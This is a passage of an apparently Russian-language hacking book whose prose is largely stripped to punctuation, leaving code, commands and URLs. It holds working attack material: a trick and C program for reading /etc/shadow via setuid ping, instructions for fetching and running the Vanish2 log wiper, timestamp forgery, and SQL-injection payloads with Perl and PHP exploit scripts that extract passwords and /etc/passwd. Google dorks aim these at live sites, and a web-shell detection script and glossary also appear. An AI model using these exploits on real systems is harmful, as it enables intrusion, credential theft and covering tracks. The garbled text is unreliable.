, su, , (, /bin/su), .
echo $PATH
$PATH .
su ,
, .
, ,
. , http://www.spywaredb.com/remove-su-trojan-ribbed/
( ):
Su trojan ribbed . ,
. Su trojan ribbed , Spyware Doctor. Su trojan ribbed , su.c.txt.
.txt . , su.c.txt. (
, ),
su. , /tmp ,
. , ,
.
, ,
. Spyware Doctor ,
.
.
/etc/shadow ,
root? .
, ,
. libc
5.4.7. suid: ping, traceroute, rlogin ssh.

115

116

0D.

1. bash, bash.
2. :
export RESOLV_HOST_CONF=/etc/shadow

3. -
, asdf:
ping asdf

, /etc/
shadow. , root. DVL Linux. ,
. ping (traceroute, rlogin, ssh) ,
RESOLV_HOST_CONF, , -, ,
, /etc/shadow. ,
(asdf), , RESOLV_HOST_CONF.
rcb.c,
:
/* RCB Phraser therapy in '96
* Limits: Linux only, no binary files.
* little personal message to the world: F*CK CENSORSHIP!
*/
#include <stdio.h>
void getjunk(const char *filetocat)
{ setenv("RESOLV_HOST_CONF",filetocat,1);
system("ping xy 1> /dev/null 2> phrasing");
unsetenv("RESOLV_HOST_CONF");
}
void main(argc,argv)
int argc; char **argv;
{ char buffer[200];
char *gag;
FILE *devel;
if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
{ printf("RCB Phraser junked by THERAPY\n\n");
printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
exit(1);
}
getjunk(argv[1]);
gag=buffer;
gag+=10;
devel=fopen("phrasing","rb");
while(!feof(devel))
{ fgets(buffer,sizeof(buffer),devel);

116

117

if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24,"\n");
fputs(gag,stdout);
}
}
fclose(devel);
remove("phrasing");
}


rcb /etc/shadow

/etc/shadow ,
.
Linux 2.6.7-rc3 (
, - )
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit, , /etc/passwd, ,
. 2004 ,
Marco Ivaldi,
http://www.exploit-db.com/exploits/718/

, root ?
, (
!), ,
, .
,
. , :
last login from xxx.com time:0:00 date:xx/xx/xx,

IP- ,
. ,
ssh localhost
. ,
:
last login from localhost

, .

117

0E


-, (log wiper).
-, () -.
, ,
. ,
. ,
,
(root ),
.
Apache,
/usr/local/apache/logs/access_log. (. 0E.1).

. 0E.1. access_log

Vanish2, Neo The Hacker.


:
http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz

118

119

WTMP, UTMP, lastlog, messages, secure, xferlog, maillog,


warn, mail, httpd.access_log, httpd.error_log.
messages, secure httpd.access_log. Vanish2
.
. ,
.
/tmp :
wget -O vanish2.tgz http://packetstormsecurity.org/UNIX/
penetration/log-wipers/vanish2.tgz

:
tar -xzvf vanish2.tgz

:
gcc vanish2.c -o vanish2

(Damn Vulnerable Linux) , , exit .


exit() exit(0). (. 0E.2):
vanish2 nobody localhost 127.0.0.1

. 0E.2. Vanish2

utmp , wtmp . ,
Vanish2 - , .
Vanish2,
. , , .
exit(0),
, , :
// exit(0);

119

120

0E.

access_log error_log .
, . 0E.3. access_log, ,
,
127.0.0.1. IP , . , , , .

. 0E.3. Vanish2

, Vanish2 .
hacker-pro, 10 .
-
http://packetstormsecurity.org/UNIX/penetration/log-wipers/

, root , ?

last. utmp wtmp,
ssh -T
( ). , ,
. PuTTY Windows , SSHTTY (Dont allocate a pseudo-terminal). .
- , , , , touch t,
. :
touch -t [.cc] _( )

120

121

, MM , , , .
. ,
, , . ,
file.c 27 2009 23 35 22 ,
:
touch -t 200906272335.22 file.c

, .

121

0F

, , , .
,
root, .
, , , . , ( w who)
( last). ,
, last _.
( finger). /etc/passwd
/etc/shadow, . ,
, FTP, . PuTTY, ,
SessionLogging (Printable Output). putty.log ( , ).
cat
.
.
/etc/shadow,
( /etc/shadow.old shadow, ).
LDAP, /usr/local/openldap/backup LDAP . ,
, ,
base64. Perl,
0C, ,
John The Ripper.

.bash_history.

122

123

(root). , (
.sh . .).
,
, .
root
hack, hacking, hacker, intruder . . ,
check_intruder.sh ,
. , ,
, ,
.
/etc/hosts ssh/known_hosts,
, .
root .
root , root
,
ssh:
ssh root@other-host.net

123

10

,
. 3 (. 10.1).
. SQL-
, . XSS
.
, (
),
, .
,
(). : FTP,
PHP ,
(system(), passthru() shell_exec()), perl- python- . ,
-, .
-
,
.
,
(,
).
, root , .
, , ,
, .
, .

124

. 10.1.

125

125

11

(remote) , .
.
(). ,
.
, ( -),
ftp- ProFTPD.
1.3.1 1.3.2 rc 2, SQL-. ( )
ftp- ( 21),
:
USER myuser

myuser .
:
PASS password

password myuser. , FTP (


, , ).
% SQL-, users () ,
1:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -PASS: 1

.
http://downloads.securityfocus.com/vulnerabilities/exploits/33722.pl

:
./exploit.pl ftp.example.com

126

127

ftp.example.com ( ftp FTP). ,


:
[*] Connected To ftp.example.com
[!] Please Choose A Command To Execute On ftp.example.com :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here =>

, 2005
: Linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit. ftp-
Linux.
,
. Sun
OpenSolaris (LiveCD). - ,
OpenSolaris,
DHCP- (
), jack
jack su
opensolaris. 2008 , Sun
.
,
.

127

12


. , , , . . (
, 2005). 100
(), , .
,
check.sh ( ),
-. , - -, r57shell, 99sh, void.ru,
PHP-, shell_exec,
base64_decode create_function.
/var/log/check.log, -
. , .
, shell_exec,
, - eval,
system passthru. , (cgitelnet, nfm . .).
#!/bin/bash
if [ $# -lt 1 ]; then
echo "usage: $0 file_name";
exit 0;
fi
RESULT=""
FILE=""
for F in $( grep "\.php$" $1 ); do
FIND=`echo $F | grep -c "\.php$"`
if [ "$FIND" == "0" ]; then
if [ "$FILE" == "" ]; then
FILE=$F
else
FILE=$FILE" "$F
fi

128

129

else
if [ "$FILE" == "" ]; then
FILE=$F
else
FILE=$FILE" "$F
fi
F1="/usr/"$FILE
if [ -f "$F1" ]; then
RE=`grep -c r57shell "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
fi
RE=`grep -c gzinflate "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
fi
RE=`grep -c 99sh "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
echo $FIND "$FILE"
fi
RE=`grep -c "\.void\.ru" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
echo $FIND "$FILE"
fi
RE=`grep -c "shell_exec" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nshell_exec:FIND possible hack file "$F1
echo $FIND "$FILE"
fi
RE=`grep -c "base64_decode" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nbase64_decode:FIND possible hack file "$F1
echo $FIND "$FILE"
fi
RE=`grep -c "create_function" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\ncreate_function:FIND possible hack file "$F1
echo $FIND "$FILE"
fi
fi
FILE=""
fi
done;
FILE=""
for F in $( grep "\.htaccess$" $1 ); do
FIND=`echo $F | grep -c "\.htaccess$"`
if [ "$FIND" == "0" ]; then
if [ "$FILE" == "" ]; then
FILE=$F
else
FILE=$FILE" "$F

129

130

12.
fi

else

if [ "$FILE" == "" ]; then


FILE=$F
else
FILE=$FILE" "$F
fi
echo $FIND "$FILE"
F1=$FILE
if [ -f "$F1" ]; then
RE=`grep -c "application/x-httpd-php" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
fi
fi
FILE=""

fi
done;
FILE=""
for F in $( grep "index\.html$\|index\.php$\|index\.htm$" $1 ); do
FIND=`echo $F | grep -c "index\."`
if [ "$FIND" == "0" ]; then
if [ "$FILE" == "" ]; then
FILE=$F
else
FILE=$FILE" "$F
fi
e
if [ "$FILE" == "" ]; then
FILE=$F
else
FILE=$FILE" "$F
fi
#
echo $FIND "$FILE"
F1="/usr/"$FILE
if [ -f "$F1" ]; then
RE=`grep -i -c "viagra" "$F1" `
if [ "$RE" != "0" ]; then
RESULT=$RESULT"\nFIND possible hack file "$F1
fi
fi
FILE=""
fi
done;
if [ "$RESULT" != "" ]; then
echo -e `date`$RESULT >> /var/log/check.log
echo -e `date`$RESULT | mail -c sysadm@mysite.net -s "Red Alert!
possible hack file on mysite.net" admin@mysite.net
else
echo -e `date`" didn't find intruder." >> /var/log/check.log
fi

130

13


IT-

,
. ,
, . , , ,
,
. , .



, .
.
, , ,
(!).
1990- ,
()
. ( , )
,
( ABF),
(subsidiary) .

,
,
. ,
( ).
ABF ( , ,

131

132

13. IT-

) -
, .
. ,
.
(
), .
, .
.
3- LINC II. , , 1970-.
LINC II,

, ,
.
, LINC II,

LINC II , , , .
, ,
.
, :
. ,
,
.
.
, , - .
, , . .
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.

, , ,
, ,
. , ,
. UNISYSUNISYS,

132

ICQ

133

. , UNISYS
UNIMAS ( , , )
, ! .
,
.
, ( )
, ,
, . ? , ,
,
.
?
,
, , ,
IT- ,
. .
.

ICQ
2007 , . ,
, ( ), . , , ,
. ,
.
: , ?
,
, . . ,
, ,
. ,
, , jimm.

, - . , jimm Java .
(

133

134

13. IT-

), Java
, jar-.
. -, jimm ,
ICQ. . , , jimm, .
: -,
; -,
; -, ( , ) ,
, , .
,
, , , . .
,
jimm
, , . , ,
,
- .
, , . ? :
ICQ-.
, .
, ,
.
, , ,
. .
, ,
. -
ICQ, : .
, , .
.
(, !)
ICQ (, , ). , ,
. .
,
, , 273 , ,
.

134

135

,
. , ,
, , , ,
, ! - ,
ICQ- . , , , .
, .
.
, , ? , , . .

,

,
,
.
, 2005 .
, ,
, Linux.
,
.
, , ,
/tmp, , , , . , /tmp
.
Windows, .
, ,
- IP-.
, , ,
- - Perl.
: , , .
- .
, ,
. , , -,
.
, -.

135

136

13. IT-

- , , .
,
, ,
.
, Google, .
, ,
-, . Google
, .
, /tmp ,
. , - ,
-,
. . , Linux Unix- ,
, , ,
.
, ?
,
, -, , .
- , ,
90-, .
, ,

-,
, . ,
, -
Google . - .
, ,
.
root , ( , suid).
Linux
2.6.x, 2.4.x (
). , , , Google
( linux kernel 2.4. local root exploit)
root, .

136

137

, ,
, , ,
- .
. ,
,
, ,
.
.
, , ,
,
- , .
, ,
, - .
, ,
. ,
.

137

*nix-

ls <dir>

.
dir

. .
pwd

.
cd <dir>

.
cat <file>

.
id

.
whoami

? .
uname a

.
uptime

( ).
netstat

.
man <command>

*nix-.
<command> -help

.
users

.
who

, .
w

, .

138

*nix-
ps


ps Al

.
kill <PID>

<PID>.
finger <login>

.
last

.
last <login>

.
cp <file> <newlocation>

.
mv <file> <newlocation>

.
rm <file>

.
mkdir <dir>

.
rmdir <dir>

.
chmod xxx <file>

.
vi <file>

vi.
vim <file>

.
cc <file> -o <outfile>

C.
gcc <file> -o <outfile>

C GNU.
wget O <outfile> <url>

.
curl o <outfile> <url>

139

139

SQL-
show.php Cyphor

SQL- show.php.
Cyphor.
,
show.php , , , , .
.
.
, cyphor/admin/forum-create.php ,
. 2.1, include("check.php")
#.
. .

. 2.1. cyphor/admin/forum-create.php


http://localhost/webexploitation_package_02/cyphor/admin/forum-create.php

, . 2.2,
Create Forum.
SQL- id.
(. 2.3):
http://localhost/webexploitation_package_02/cyphor/show.php?fid=1&id=-10
union select 1,2,3,4,5,nick,password,8,id,10 from cyphor_users where id=1

cyphor_users id, nick password , id=1 ().

140

SQL- show.php Cyphor

. 2.2. Cyphor

. 2.3. SQL- id show.php Cyphor

141

141

142

2. SQL- show.php Cyphor

: ? MySQL information_schema tables columns.


:
union select 1,2,3,4,5,6,group_concat(table_name),8,9,10
from information_schema.tables.

SQL- fid
show.php. , (
,
).
, , fid
(, fid=1), id
. , - :
fid=-1 union select 1,2,3,4 from cyphor_users

(. 2.4).

. 2.4. SQL cyphor_4

, : cyphor_4. (
show.php) , , .
, msg_test.

142

SQL- show.php Cyphor

143

'msg_test' ( ,
, ).
.
- ,
concat:
http://localhost/webexploitation_package_02/cyphor/show.php?fid=-1 union
select 1, concat(nick,0x3a,password),3,'msg_test' from cyphor_users

. 2.5.

. 2.5. SQL- d show.php

, ,
, .
.

143



Cyphor

Cyphor crypt (), .


,
8 , ,
1000 ( PHP
). - , ? , .
, (register.php),
random_password ( globals.php).
8- , , ,
.
, time(). ,
Unix- , 1 1970 . ,
cyphor_users
( signup_date). SQL-
, . 3.1.

. 3.1. , ( )

144

Cyphor

145

PHP,
, ,
( signup_date). register.php ,
signup_date + 1 (
). ,
signup_date, random_password.
( ,
). ,
( crack-pass.php), . 3.2.

. 3.2. crack-pass.php

crack-pass.php , .
. 3.3.
( ). cyphor ( README.
txt, ).
.

145

146

3. Cyphor

. 3.3. crack-pass.php

.
, .
email SQL-. , . ,
( ,
, ) , , . 3.4 ( brute-pass.php).

. 3.4. brute-pass.php

146

Cyphor

147

45 .
,
.
. 3.5. alice 118 .

. 3.5. brute-pass.php

( )
. , , ,
, (
).
,
, , . 5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, , 8.
, , HTTP-.

147

148

3. Cyphor

,
Telnet ( 80) , :
telnet 127.0.0.1 80

GET / HTTP/1.1 Enter. -


, ,
. 3.6. , - ,
PHP. .

. 3.6. -


.
,
.
crack-pass.php.
, PHP , ,
( ,
*nix-,
admin, - ;
, ;
, John The Ripper).
, ,
.
. , SQL-, UPDATE,
3 ().
.
, !
.

148

Cyphor

149

,
?
, . ,
md5- , uname -a,
id, pwd, who, ps . . ( Cyphor *nix-),
, .

. - .

149


SQL Cyphor

, ,
http://www.securiteam.com/unixfocus/6P00F1FEKC.html.

- , ,
cyphor019.pl. , , $url, users cyphor_users. . , $url
, .
#!/bin/env perl
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 Abducter Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] 1 #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 Abducter almastar #";
print "\n#####################################################\n";
exit(0);
}
else
{
print "\n# Greets To Devil-00 Abducter almastar #";
print "\n#####################################################\n";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "show.php?fid=2&id
=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,
10%20from%20cyphor_users%20where%20id=$id";

150

SQL- Cyphor

151

$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
$page =~ m/<span class=bigh>(.*?)<\/span>/
&& print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/<span class=message>(.*?)<\/span>/
&& print "[+] Hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
print "\n\nGreets From HACKERS PAL To you :)
\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished

.
html-, <span class=bigh>
</span> ( ) , <span
class=message> </span> .

perl cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1

, ,
( 1). . 4.1.

. 4.1. SQL- Cyphor


SQL-
.

151

SQL-
MS SQL Jet

,
.
1. Google:
site:.org inurl:.asp?id=
site:.com inurl:.aspx?=
site:.co.uk inurl:.asp?cid=

- .
2. , http://www.site.com
:
http://www.site.com/en/pressread.asp?id=563

. URL
, :
http://www.site.com/en/pressread.asp?id=563'

:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in
string in query expression 'id=563' ;'.
/en/includes/configdb.asp, line 23

, , AND+1=1:
http://www.site.com/en/pressread.asp?id=563+AND+1=1#

ASP #,
-- /*.

type mismatch Cint


, .
, ,
, . AND+1=0#:
http://www.site.com/en/pressread.asp?id=563+AND+1=0#

152

SQL- MS SQL Jet

153

:
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.
/en/pressread.asp, line 44

, ORDER BY . , , 10.
, :
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 23

, 10 .
, . 7:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7#

:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain
at least one table or query.
/en/includes/configdb.asp, line 23

, . :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7 FROM user#

, :
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine cannot find the input table or query 'user'. Make sure it
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23

, , , : user, users, admin, login, news, sysobjects, customers. ,


admin. ,
,
, , 4 :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7+from+admin#

153

154

5. SQL- MS SQL Jet

3. , GROUP
BY ... HAVING, :
HAVING 1=1 -GROUP BY -.-----1 HAVING 1=1 -GROUP BY -.-----1,
-.-----2 HAVING 1=1 -GROUP BY -.-----1,
-.-----2,
----- (n) HAVING 1=1 -- . .

154


nabopoll.php

06, , .
, .
, . :
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
# July 1, 2010 modified by Uri
error_reporting(0);
ini_set("max_execution_time",0);
$srv = "localhost"; $path = "/webexploitation_package_02/nabopoll";
$port = 80;
$survey = "1"; //you can verify the number entering in the site
and viewing the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- /etc/passwd: \n";
$j = 1; $user = "";$x=0;
while(!strstr($user,chr(0))){
$minx = 0; $maxx = 255;
$found = false; $op = ">";
while(!$found) {
$x = intval(($maxx + $minx)/2);
if ($maxx == $minx+1) {
if ($op == ">") { $x=$maxx; $found=true;$user.=chr($x);echo chr($x);break;}
if (($op == "<=") and ($bingo)) { $x=$maxx; $found=true;$user.=chr($x);
echo chr($x);break;}
}
$bingo = false;
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(
SELECT/**/(IF((ASCII(SUBSTRING(load_file(
0x2f6574632f706173737764),".$j.",1))".$op.$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);

155

156

6. nabopoll.php

fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");


while(!feof($cnx)){ if(ereg("power",fgets($cnx))){
$bingo=true;break; } }
fclose($cnx);
if ($x==255) {die("\n Try again...");}
$prevop=$op;
if ($bingo) {
switch($op)
{
case ">":
$minx = $x;
break;
case "<=":
$maxx = $x;
break;
}
}
else
{
switch($op)
{
case ">":
$op = "<=";
break;
case "<=":
$op = ">";
break;
}
}
}
$j++;
}
echo "\n";
?>

, , - ( , , $xpl=),
.

156



SQL- MS Access

:
[...] AND (SELECT TOP 1 1 FROM _)

:
[...] AND (SELECT TOP 1 1 FROM users)

:
AND (SELECT TOP 1 _ FROM _)

:
[...] AND (SELECT TOP 1 name FROM users)

:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _ = X, 1, 0)

:
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) = 8, 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(_, X, 1)
FROM _) = CHR(XXX), 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(name, 1, 1)
FROM users ) = CHR(65), 1, 0)

157


instantCMS

The matrix,
,
.

https://forum.antichat.ru/showpost.php?p=2138088&postcount=23

, ,
http://ifolder.ru/17669676
http://webfile.ru/4490132

.
( ) .
? /components/registration/frontend.php PHP:
$sql = "SELECT * FROM cms_users WHERE email = '$email' LIMIT 1";
$result = $inDB->query($sql) ;
if ($inDB->num_rows($result)>0){
$usr = $inDB->fetch_assoc($result);
$newpassword = substr(md5(microtime()), 0, 6);
$inDB->query("UPDATE cms_users SET password =
'".md5($newpassword)."' WHERE id = ".$usr['id']) ;
$mail_message = $_LANG['HELLO'].', ' . $usr['nickname'] . '!'. "\n\n";
$mail_message = $_LANG['HELLO'].', ' . $usr['nickname'] . '!'. "\n\n";
$mail_message .= $_LANG[
'REMINDER_TEXT'].' "'.$inConf->sitename.'".' . "\n\n";
$mail_message .= $_LANG['OUR_PASS_IS_MD5'] . "\n";
$mail_message .= $_LANG['OUR_PASS_IS_MD5_TEXT'] . "\n\n";
$mail_message .= '########## '.$_LANG['YOUR_LOGIN'].': ' .$usr[
'login']. "\n\n";
$mail_message .= '########## '.$_LANG[
'YOUR_NEW_PASS'].': ' .$newpassword . "\n\n";

158

instantCMS

159

$mail_message .= $_LANG['YOU_CAN_CHANGE_PASS']."\n";
$mail_message .= $_LANG['IN_CONFIG_PROFILE'].': '. cmsUser::
getProfileURL($usr['login']) . "\n\n";
$mail_message .= $_LANG[
'SIGNATURE'].', '. $inConf->sitename . ' ('.HOST.').' . "\n";
$mail_message .= date('d-m-Y (H:i)');
$inCore->mailText($email, $inConf->sitename.' '.$_LANG[
'REMINDER_PASS'], $mail_message);

.
?
1. , .
2. , ,
, microtime().
microtime() .
,
gettimeofday().
msec sec, sec , Unix (The Unix Epoch, 1 1970, 00:00:00 GMT),
msec . - :
0.xxxxxx00 [1273589840]

xxxxxx ,
, Unix.
?
, .
- :
Tue, 11 May 2010 20:39:23 GMT

, 1970, 00:00:00
GMT.
, . 0.xxxxxx00 ( , Unix
). :
0.30001200 1273589840

xxxxxx
( ).
substr(md5(), 0, 6)

md5- , :
1a512b

159

160

8.

1 . .
-.
. ,
11 : 1000000/11=90.909 . , ,
.
, 100-,
. ,
.

160


SQL-

() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
. , ,
. , ,
, , .
/etc/passwd
. , , (, ,
/etc/passwd ,
, ).
, ,
SQL-,
.


nd_in_set(substr, strlist)
MySQL find_in_set(), , .
, . ,

161

162

9. SQL-

0. MySQL ( 'c' 'a,b,c,d,e'):


mysql> SELECT FIND_IN_SET('','a,b,c,d,e');
-> 3

md5- :
'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f'

:
select find_in_set((substring((select password from users
limit 1),1,1)),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f');

, 'a' 11. ,
1 16,
:
news.php?id=find_in_set(substring((select password from users
limit 0,1),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

,
.
.
1.
( , ).
2. find_in_set()
.
3. , , .
: 32+16 md5-.
find_in_set() : INSTR(),
LOCATE(), ASCII(), ORD(), ASCII() ORD() , MySQL.
.
:
 ;
 ,
.
:
 ,
;
 ,
, .

162

nd_in_set() + more1row

163


nd_in_set() + more1row
,
(, ).
Elekt.
, SQL-.
( podkashey)
SELECT 1 UNION SELECT 2


Subquery returns more than 1 row

ZaCo :
"x" regexp concat("x{1,25", if(@@version<>5, "5}", "6}")) /* else
*/

MySql, 5,
#1139 Got error 'invalid repetition count(s)' from regexp.

9 ,
regexp, 11
, .
SELECT 1 .
:
select if(1=1,(select 1 union select 2),2)
#1242 Subquery returns more than 1 row
select 1 regexp if(1=1,"x{1,0}",2)
#1139 Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 Got error 'braces not balanced' from regexp
select 1 regexp if(1=1,'[[:]]',2)
#1139 Got error 'invalid character class' from regexp
select 1 regexp if(1=1,'[[',2)
#1139 Got error 'brackets ([ ]) not balanced' from regexp
select 1 regexp if(1=1,'(({1}',2)
#1139 Got error 'repetition-operator operand invalid' from regexp
select 1 regexp if(1=1,'',2)
#1139 Got error 'empty (sub)expression' from regexp
select 1 regexp if(1=1,'(',2)
#1139 Got error 'parentheses not balanced' from regexp
select 1 regexp if(1=1,'[21]',2)
#1139 Got error 'invalid character range' from regexp
select 1 regexp if(1=1,'[[.ch.]]',2)
#1139 Got error 'invalid collating element' from regexp
select 1 regexp if(1=1,'\\',2)
#1139 Got error 'trailing backslash (\)' from regexp

163

164

9. SQL-

find_in_set(). , , , 0.
:
select * from users where id=-1 AND "x" regexp concat(
"x{1,25", if(find_in_set(substring((select passwd from users
where id=1),1,1),'a,b,c,d,e,f,1,2,3,4,5,6')>0, (
select 1 union select 2), "6}"))

'a,b,c,d,e,f,1,2,3,4,5,6',
:
#1242 Subquery returns more than 1 row


#1139 Got error 'invalid repetition count(s)' from regexp

, . , .
md5- , [09, a-f]. ,
12 (11 , ). , :
[1]: '0','b','c','d','e','f'
[2]: '1'
[3]: '2'
[4]: '3'
[5]: '4'
[6]: '5'
[7]: '6'
[8]: '7'
[9]: '8'
[10]: '9'
[11]: 'a'

, ,
, .
2- 11-,
. 1,
-
:
[1]:
[2]:
[3]:
[4]:
[5]:
[6]:

'0'
'b'
'c'
'd'
'e'
'f'

SQL .

164

nd_in_set() + more1row

165

1. .
2. ,
.
3. , , , ,
1.
, , ,
[a-z, A-Z, 09] 11
.
,
,
,
.
, 42 md5-.
:
 ;
 .
, ,
.

165

10

.
,
. , ,
.
, (,
, ).
0-day ,
.
0- . -.
jtr . .
(abend, aborption end) .
(abort) () .
(abuse) .
,
,
.
(admin) .
. .
(account) , .
. .
(, ) ICQ (--), .
, (black hat) , .
.
.

166

167

FreeBSD ( BSD, NetBSD OpenBSD).


, (white hat) , ,
, . .
Windows.
.
(vire) .
Hydra.
, (gray hat, grey hat) , ,
.
(Distributed Denial of Service, DDoS)
.
( dedicated) .
John The Ripper.
. .
, , .
(Denial of Service, DoS) .
.
Java ( ).
, JavaScript.
DoS-.
( use) .
(inject) , . .
(include) .
(including) . .
(include) .
(injection) , , , .
(IRC) .
, .
.
() (keyboard) .
(keygen) .
.

167

168

10.

(code) , -
.
(coding) .
.
(core) .
netcat.
(crack) , - .
(cool hacker) ( ).
(lamer) , ;
, .
(.) Linux.
(log) ( ).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -, ).
(must have) - , .
, .
(mIRC) .
.
MySQL.
(mail) , e-mail.
.
.
netcat (nc).
(nick, nickname) .
Unix- .

168

169

(null) , , .
- (null-byte, 0-byte) .
(nuke) , .
. .
.
(OS) , .
(public sploit) , , , 0-day sploit.
(pass, password) .
, Python Python.
OS/2 IBM (
).
( to root)
.
( use) .
( use) , .
, -.
PHP PHP.
(root) *nix-.
root.
.
, SunOS.
.
, (secure) .
.
. .
,
.
.
. .
(script-kiddie) -,
, , .
. .
, SQL.

169

170

10.

, (sniffer) , - (,
cookie).
, Solaris.
(soft) , .
.
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ).
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ) .
(phishing)
.
, (flood) .
FreeBSD.
. .
(hack) .
(hacking) ,
-.
.
. .
(host) , , .
.
.
. .

170

171

- (Internet worm), .
(shell) .
ICQ, .
(exploit) , .
( use) , . , , .
. .
(user) .
. .

171

-: (+DVD)




.
.
.
.
.
. , .
.

23.11.10. 70100/16. . . . 14,19. 1500. 0000.


, 194044, -, . ., 29.
CtP . . . .
197110, -, ., 15.

172


, ,
,

/ . , . ., . 29
./: (812) 7037373, 7037372; email: sales@piter.com
. , ., . 2/1, . 1, 6
./: (495) 23438-15, 97434-50; e-mail: sales@msk.piter.com

., . 169; ./: (4732) 396170


email: piterctr@omch.ru
. , . 11; ./: (343) 3789841, 3789842
mail: office@ekat.piter.com

. , . 13; .: (8312) 412731


email: office@nnov.piter.com
. , . 36; .: (383) 363-01-14
: (383) 3501979; email: sib@nsk.piter.com
//

. , . 26; .: (863) 2699122, 2699130


mail: piterug@rostov.piter.com

. , . 33; 223; .: (846) 2778979


e-mail: pitvolga@samtel.ru

. , . 12, 10; .: (1038057) 751-10-02


758-41-45; : (1038057) 712-27-05; -mail: piter@kharkov.piter.com

., . 6, . 1, 33; .: (1038044) 4903569


: (1038044) 4903568; mail: office@kiev.piter.com

. , . 34, 2; ./: (1037517) 201-48-79, 201-48-81


mail: gv@minsk.piter.com

, .
: (812) 703/73/73. E/mail: fuganov@piter.com
.
: / (812) 703/73/72, (495) 974/34/50
.: (812) 7037373.
mail: kozin@piter.com
: www.piter.com; .: (812) 703-73-74
ICQ 413763617

173

!



.


./: (4232) 238212
email: bookbase@mail.primorye.ru

,
.: (3952) 200917, 241777
email: prodalit@irk.ru
http://www.prodalit.irk.ru

, , . , . 1
.: (4212) 360665, 339531
email: dkniga@mail.kht.ru

,
./: (3952) 252590
email: kkcbooks@bk.ru
http://www.kkcbooks.ru

,
.: (4212) 328551, : (4212) 328250
email: postmaster@worldbooks.kht.ru

,
. , . 86
./: (3912) 273971
email: bookworld@public.krasnet.ru

,
.: (4212) 394960
email: zakaz@booksmirs.ru

, 
.: (383) 3361026
: (383) 3361027
email: office@topkniga.ru
http://www.topkniga.ru


, , . , . 3
.: (8182) 654134, 653879
email: marketing@avfkniga.ru

, ,

.: (843) 2723455
email: tais@bancorp.ru

, , . , . 4
